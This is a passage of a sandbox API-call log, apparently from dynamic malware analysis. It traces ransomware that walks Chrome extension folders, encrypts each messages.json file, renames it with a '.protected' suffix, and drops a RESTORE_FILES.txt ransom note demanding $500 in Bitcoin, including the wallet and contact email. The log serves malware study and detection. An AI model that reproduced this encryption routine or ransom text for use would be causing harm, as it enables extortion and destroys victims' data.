lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.692] CloseHandle (hObject=0x164) returned 1 [0083.692] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.692] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0083.692] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0083.692] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0083.692] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0083.692] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0083.692] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it") returned 150 [0083.692] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0083.692] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0083.692] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\*") returned 152 [0083.692] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.693] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.693] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.693] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.693] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.693] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.693] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\.") returned 152 [0083.693] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.693] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.693] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.693] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.693] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.693] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.693] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.693] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\..") returned 153 [0083.693] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.693] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.693] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.693] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.693] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.693] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.693] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.693] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.693] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json") returned 164 [0083.693] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.693] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.693] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.693] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json") returned 164 [0083.694] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json") returned 164 [0083.694] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json") returned 164 [0083.694] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.694] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.702] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.702] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.703] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.703] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.713] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.713] CloseHandle (hObject=0x168) returned 1 [0083.713] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.protected") returned 174 [0083.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.protected")) returned 1 [0083.714] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.714] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.714] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\RESTORE_FILES.txt") returned 168 [0083.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.715] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.715] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.716] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.717] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.718] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.718] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.718] CloseHandle (hObject=0x164) returned 1 [0083.718] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.718] lstrcmpiW (lpString1="iw", lpString2="Windows") returned -1 [0083.718] lstrcmpiW (lpString1="iw", lpString2="Program Files") returned -1 [0083.718] lstrcmpiW (lpString1="iw", lpString2="Program Files (x86)") returned -1 [0083.718] lstrcmpiW (lpString1="iw", lpString2="$Recycle.bin") returned 1 [0083.718] lstrcmpiW (lpString1="iw", lpString2="System Volume Information") returned -1 [0083.718] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw") returned 150 [0083.718] lstrcmpW (lpString1="iw", lpString2=".") returned 1 [0083.718] lstrcmpW (lpString1="iw", lpString2="..") returned 1 [0083.718] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\*") returned 152 [0083.718] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.718] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.718] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.718] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.718] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.718] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.718] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\.") returned 152 [0083.718] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.719] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.719] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.719] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.719] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.719] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.719] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.719] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\..") returned 153 [0083.719] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.719] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.719] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.719] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.719] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.719] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.719] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.719] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.719] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json") returned 164 [0083.719] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.719] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.719] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.719] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json") returned 164 [0083.732] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json") returned 164 [0083.732] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json") returned 164 [0083.732] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.732] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.738] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.738] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.738] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.738] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.742] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.742] CloseHandle (hObject=0x168) returned 1 [0083.742] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.protected") returned 174 [0083.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.protected")) returned 1 [0083.744] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.744] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.744] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\RESTORE_FILES.txt") returned 168 [0083.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.744] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.744] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.745] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.745] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.745] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.746] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, 